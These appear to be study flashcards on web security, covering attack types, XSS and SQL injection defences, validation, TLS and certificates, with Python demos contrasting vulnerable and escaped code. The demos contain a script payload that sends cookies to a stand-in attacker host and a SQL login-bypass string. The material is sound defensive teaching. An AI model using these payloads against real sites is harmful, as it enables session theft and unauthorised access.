Web Security Flashcards
Why would an attacker target my site?
- Read private data (user names, passwords, credit card numbers, grades, prices)
- Change data (change a student’s grades, prices of products, passwords)
- Spread viruses and other malware
- Damage or shut down the site, so that it cannot be successfully used by others
- Harm the reputation or credibility of the organization running the site
- Spoofing (pretending to be someone they are not)
Some Security Recommendations:
- Examine your own page source and server-side script code the way an attacker would
- Examine network traffic and AJAX requests (the browser's developer tools show everything the client sends and receives)
- Listen to white hat hackers
- Assume that the attacker knows about web dev and has the same tools you have
- COMPLEXITY INCREASES SECURITY RISK
Awareness + Protection = Security
assume nothing; trust no one
A selection of attack types
- Denial of Service (DoS): Making a server unavailable by bombarding it with requests
- Social Engineering: Tricking a user into compromising the security of a site (e.g. phishing)
- Privilege Escalation: Gaining a higher level of access than intended (e.g. causing code to run in a "privileged" context such as "root")
- Information Leakage: Allowing an attacker to look at data meant to be confidential
- Man-in-the-Middle: Intercepting the traffic between two parties, and reading and/or manipulating it
- Session Hijacking: Stealing another user’s session cookie to masquerade as that user
  - an attacker on the same network can listen to the traffic (if the site is served over plain HTTP), get your session ID cookie, and make requests to the same server with that same cookie to masquerade as you (example: Firesheep)
- Cross-Site Scripting (XSS) or HTML Injection: Inserting malicious HTML or JavaScript content into a web page
  - injected script code can:
    - masquerade as the original page and trick the user into entering sensitive data
    - steal the user’s cookies (unless they are marked HttpOnly)
    - masquerade as the user and submit data on their behalf (submit forms, click buttons, etc.)
- SQL Injection: Inserting malicious SQL query code to reveal or modify sensitive data
Securing against HTML injection / XSS / SQL injection
- disallow harmful characters
  - HTML injection into element content is impossible without < >; inside an attribute or a script block, however, quotes and other characters are enough, so check what context the value ends up in
- allow them, but escape them (encode the value for the context it is output in)
- prevent blank values (such as for email)
- ensure the type of the value (integer, date, etc.)
- ensure the format and the range of the values (e.g., postcode format)
- ensure certain combinations of values fit together properly
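The two escaping strategies above, as an added example (not code from the original flashcards). It contrasts a vulnerable template with one that escapes the value using Python's standard library `html.escape`, and shows the attribute case where the attacker needs no angle brackets at all. The payloads and the `attacker.example` host are constructed for the demo; `parse_tags` uses the standard `html.parser` module to show which tags and attributes a browser would actually see.

```python
import html
from html.parser import HTMLParser

# Constructed attacker inputs (example data, not from the flashcards).
SCRIPT_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = "x onmouseover=alert(1)"   # contains no < or > at all


def reject_markup(value):
    """Strategy 1: disallow harmful characters outright (fine for names, ids, etc.)."""
    if "<" in value or ">" in value:
        raise ValueError("angle brackets are not allowed in this field")
    return value


def greet_unsafe(name):
    """Vulnerable: user data is concatenated straight into element content."""
    return "<p>Hello, " + name + "</p>"


def greet_safe(name):
    """Strategy 2: allow the characters but escape <, >, &, \" and ' for HTML."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def input_unsafe(value):
    """Vulnerable even without < or >: an unquoted attribute value ends at the
    first space, so the rest of the input becomes a new attribute (an event
    handler here)."""
    return "<input value=" + value + ">"


def input_safe(value):
    """Quote the attribute AND escape quotes so the value cannot break out."""
    return '<input value="' + html.escape(value, quote=True) + '">'


class _TagCollector(HTMLParser):
    """Records the start tags and their attributes, i.e. what a browser sees."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(fragment):
    """Return [(tag_name, {attr: value}), ...] for an HTML fragment."""
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    for label, fragment in [("unsafe", greet_unsafe(SCRIPT_PAYLOAD)),
                            ("safe", greet_safe(SCRIPT_PAYLOAD)),
                            ("attr unsafe", input_unsafe(ATTR_PAYLOAD)),
                            ("attr safe", input_safe(ATTR_PAYLOAD))]:
        print(label, "->", parse_tags(fragment))
```

Note that `greet_safe` and `input_safe` are only correct for the HTML element-content and quoted-attribute contexts; a value placed inside a `<script>` block or a URL needs a different encoding, which is why the card says to escape for the context the value is output in.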
Securing against SQL injection specifically
- escape the string before you include it in your query
  - replaces ' with an escaped form (such as '' or \'), etc., and surrounds the value with quotes
- sanitise user input
- use prepared statements (i.e. a pre-compiled SQL query template whose placeholders are filled with the values, so the values are never parsed as SQL); this is the preferred approach
- limit database permissions (principle of least privilege: the account the web application uses should only be able to do what the application needs, so an injection cannot drop tables or read unrelated data)
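A worked comparison of the three code-level defences above, added here as an example rather than taken from the flashcards. It uses Python's built-in `sqlite3` with an in-memory database and constructed sample rows; the user table, the `' OR '1'='1` payload and the hypothetical `login_*` functions are all assumptions for the demo.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory users table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "s3cret", "admin"),
        ("bob", "hunter2", "student"),
    ])
    return conn


def login_vulnerable(conn, username, password):
    """Vulnerable: the values are concatenated into the SQL text, so a quote in
    the input ends the string literal and the rest is executed as SQL."""
    query = ("SELECT username, role FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchall()


def sql_escape(value):
    """The 'escape the string' approach: double every single quote and wrap the
    result in quotes. Safe for string literals, but easy to forget somewhere."""
    return "'" + value.replace("'", "''") + "'"


def login_escaped(conn, username, password):
    query = ("SELECT username, role FROM users WHERE username = " + sql_escape(username) +
             " AND password = " + sql_escape(password))
    return conn.execute(query).fetchall()


def login_prepared(conn, username, password):
    """Prepared statement: the query template is fixed and the values are bound
    to the ? placeholders, so they can never change the query's structure."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"          # constructed attacker input for the password field
    print("vulnerable:", login_vulnerable(db, "alice", payload))   # every row comes back
    print("escaped:   ", login_escaped(db, "alice", payload))       # []
    print("prepared:  ", login_prepared(db, "alice", payload))      # []
```

With the payload in the password field the vulnerable query becomes `... WHERE username = 'alice' AND password = '' OR '1'='1'`, which is true for every row, so the attacker is logged in without knowing any password. The same payload is treated as an ordinary (wrong) password by the other two functions.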
Client-Side Validation vs. Server-Side Validation
+ what each is used for
Client-Side Validation
Two ways:
- Implicit: having the browser automatically enforce certain limitations (e.g. using radio buttons or a drop-down list rather than a free-text field).
- Explicit: the validation is done by the page’s author through JavaScript.
Client-side validation improves usability and saves round trips, but it is not a security control: the attacker can disable or edit the JavaScript, or send requests directly, so every check must be repeated on the server.
Server-Side Validation
- Regular expressions are commonly used in server-side validation. (A regular expression is a sequence of characters that defines a search pattern.)
- This is the validation that actually protects the site, because the client cannot bypass it.
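An added example of server-side validation that applies the checks listed under "Securing against HTML injection / XSS / SQL injection" (blank values, type, format and range, and combinations of values) using regular expressions and type conversion. It is not code from the flashcards; the field names, the enrolment scenario and the 4-digit postcode pattern are assumptions made for the demo.

```python
import re
from datetime import date

# Illustrative patterns (assumed for this example, not from the flashcards).
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
POSTCODE_RE = re.compile(r"^[0-9]{4}$")      # hypothetical 4-digit postcode format


def validate_enrolment(form):
    """Validate a submitted form (a dict of strings, exactly as received from
    the request and therefore untrusted). Returns {field: error}; an empty
    dict means the input passed every check."""
    errors = {}

    # blank check, then format check with a regular expression
    email = form.get("email", "").strip()
    if not email:
        errors["email"] = "must not be blank"
    elif not EMAIL_RE.match(email):
        errors["email"] = "is not a valid email address"

    # type check (integer) followed by a range check
    try:
        age = int(form.get("age", ""))
        if not 16 <= age <= 120:
            errors["age"] = "must be between 16 and 120"
    except ValueError:
        errors["age"] = "must be a whole number"

    # format check
    if not POSTCODE_RE.match(form.get("postcode", "")):
        errors["postcode"] = "must be exactly 4 digits"

    # type check (date) on two fields, then a combination check across them
    parsed = {}
    for field in ("start", "end"):
        try:
            parsed[field] = date.fromisoformat(form.get(field, ""))
        except ValueError:       # raised for "", "2024-02-30", "next week", ...
            errors[field] = "must be a real date in YYYY-MM-DD form"
    if "start" in parsed and "end" in parsed and parsed["end"] < parsed["start"]:
        errors["end"] = "must not be before the start date"

    return errors


if __name__ == "__main__":
    # Constructed sample submissions.
    good = {"email": "a@b.example", "age": "20", "postcode": "1234",
            "start": "2024-01-10", "end": "2024-06-30"}
    bad = {"email": "", "age": "20abc", "postcode": "12A4",
           "start": "2024-06-30", "end": "2024-01-10"}
    print(validate_enrolment(good))   # {}
    print(validate_enrolment(bad))
```

Because the function only ever works on the raw strings and converts them itself, it does not matter whether the browser ran its own validation first or whether the request was crafted by hand.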
definition and characteristics of SSL and TLS
cryptographic protocols designed for secure communication over a computer network (SSL is the older, now deprecated protocol; TLS is its successor). They use asymmetric cryptography during the handshake to authenticate the server and agree on a key, and symmetric cryptography to encrypt the actual data.
- To use SSL/TLS a certificate issued by a certificate authority is required; commercial certificates can cost up to a couple of hundred dollars, though domain-validated certificates are also available free of charge from some CAs.
- Using SSL/TLS may have an impact on performance because encrypting and decrypting messages consumes CPU time and memory.
explain the SSL or TLS handshake
between an SSL/TLS client and server (this is the classic RSA key-exchange handshake used up to TLS 1.2; TLS 1.3 replaces the encrypted-secret step with an ephemeral Diffie-Hellman exchange, and client certificates are optional in both)
- Client contacts the server (ClientHello, listing the cipher suites it supports)
- Server responds with its server certificate (and the cipher suite it chose)
- Client checks the certificate (valid, not expired, signed by a trusted CA, matching the host name) and the cryptographic parameters
- Client sends a secret (the pre-master secret) encrypted with the server's public key, plus its own client certificate if the server asked for one
- Server verifies the client certificate (if one was sent)
- Client and server signal that everything has been checked (Finished messages)
- Application data is then exchanged encrypted with the shared symmetric session key derived from that secret
list 3 types of certificates
Domain Validation (DV) - Certificate Authority (CA) checks only the domain name.
Organisation Validation (OV) - CA checks domain and vets some information about organisation.
Extended Validation (EV) - CA checks domain and conducts thorough vetting of multiple aspects of the organisation, according to strict guidelines.
How are the HTTP POST and GET methods related to security?
In forms,
HTTP POST requests supply additional data from the client (browser) to the server in the message body.
GET requests hold all data in the URL, which is less secure: the URL, and so the data, ends up in the browser history, bookmarks, server and proxy logs and Referer headers. Note that without TLS both methods travel in clear text and can be read by anyone on the network, so POST is not a substitute for HTTPS.
What might different error messages in browsers reveal to attackers?
a 403 error shows that the resource exists but access to it is forbidden, whereas a 404 says it does not exist
this information can be useful for attackers (e.g. to enumerate which hidden files or directories are present); detailed error pages such as stack traces or raw database errors reveal even more
How can the page source be used for an attack?
the page source of a website might reveal valuable information to attackers, like commented-out sections revealing personal data, or other details about how the site works
server-side vs. client-side security
server-side code is never sent to the user, so its logic and secrets stay hidden: more secure
client-side code (HTML, CSS, JavaScript) is fully visible to, and modifiable by, the user, so it cannot enforce security on its own
(JavaScript can run on both the server and the client side)
What are botnets?
(NOT NEEDED FOR EXAM)
When a hacker has gained access to your computer or website, they will build in a backdoor for future access, creating an army of "zombie" computers that can be made to perform any kind of task, such as data crunching, data theft or DoS attacks.
In order to write secure code, we must assume:
- invalid input
- evil users
- incompetent users
- everything that can go wrong, will go wrong
- everybody is out to get you
- botnets, hackers, script kiddies, KGB, etc. are out there